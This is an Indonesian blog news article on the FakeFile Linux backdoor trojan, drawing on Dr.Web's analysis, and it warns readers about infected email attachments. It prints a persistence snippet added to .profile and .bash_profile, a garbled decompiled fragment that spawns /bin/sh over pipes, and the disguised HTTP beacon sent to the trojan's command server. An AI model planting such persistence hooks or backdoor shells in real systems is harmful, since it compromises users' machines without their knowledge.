Trojan FakeFile Serang Sistem operasi Berbasis linux, Kecuali OpenSUSE


Sebuah Trojan menyerang sistem operasi berbasi linux khususnya desktop ditemukan bulan pada Oktober ini. Vendor Antivirus Rusia Dr.Web telah menganalisis jenis trojan baru ini dan mengatakan bahwa trojan ini tersebar dalam bentuk PDF, Microsoft Office, dan Open Office.

Trojan ini tidak menyerang distro OpenSUSE
Infeksi trojan ini akan berjalan setelah membuka file yang terinfeksi dengan menggandakan dirinya ke file
<HOME>/.gconf/apps/gnome-common/gnome-common

Trojan ini juga membuat shortcut ke file .profile milik user dan .bash_profile yang memnungkinkan file ini tetap berjalan bahkan setelah di reboot (persistance).
Berikut script nya :
# if execute the gnome-common
if [ -d "$HOME/.gconf/apps/gnome-common/" ] ; then
"$HOME/.gconf/apps/gnome-common/gnome-common"
fi

Uniknya, trojan ini memiliki aturan khusus dalam source code nya yang mencegah infeksi ke distro Linux OpenSUSE. Alasan untuk ini mungkin karena penulis malware menggunakan distro OpenSUSE, tapi ini hanya spekulasi, karena teori ini belum di verifikasi.
Berikut ini potongan kodesumber trojan FakeFile :
pipe(v32); pipe(v31); status = status = fork(); if ( !status ) { { close(0); dup(v31[ dup(v31[0]); close(1); dup(v32[ dup(v32[1]); close(2); dup(v32[ dup(v32[1]); close(v32[1]); close(v31[0]); close(v32[0]); close(v31[1]); sleep(1u); while ( execl("/bin/sh", "/bin/sh", 0) < 0 ) sleep(1u); exit(status); } v5}v50 = dup(0); v51 = dup(v51 = dup(1); v52 = dup(v52 = dup(2); close(0); dup(v32[dup(v32[0]); close(1); dup(v31[dup(v31[1]); close(v31[1]); close(v32[0]); close(v31[0]); close(v32[1]); write(1, s1, strlen(s1)); write(1, &unk_8053D40, 1u);

Setelah malware dijalankan, akan ada dua "tugas" yang dilakukan, pertama, mengirim informasi pengguna ke server pusat trojan dengan command and control (C&C). Jika trojan tidak menerima instruksi selama 30menit, mana koneksi akan terputus.
Ketika berbagi informasi dengan C&C server, reply dari server yang menyamar di bawah permintaan HTTP yang terlihat sebagai berikut:
GET /index.asp?title=Welcome&picture=welcome.gif<encrypted string>
HTTP/1.0
Host: <IP address of a victim>
User-Agent: Mozilla/4.0
Connection: Keep-Alive
Accept: * /*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
FakeFile dapan menjalankan perintah sebagai berikut:


Bagian yang paling menakutkan adalah FakeFile ini tidak memerlukan akses root untuk semua operasi ini, dan dapat bekerja dengan baik dengan izin pengguna saat ini.
Untuk informasi lebih lanjut mengenai Trojan FakeFile ini bisa di lihat di Dr.Web

Linux.BackDoor.FakeFile.1

Cara penyebaran trojan ini adalah melaui spam yang dilampiri file dokumen. jadi buat kalian yang menerima file dokumen dari email tak dikenal berhati hatilah, karena trojan jenis baru ini mungkin belom terdeteksi virus oleh provider email yang kalian gunakan.
Facebook CommentsShowHide

0 comments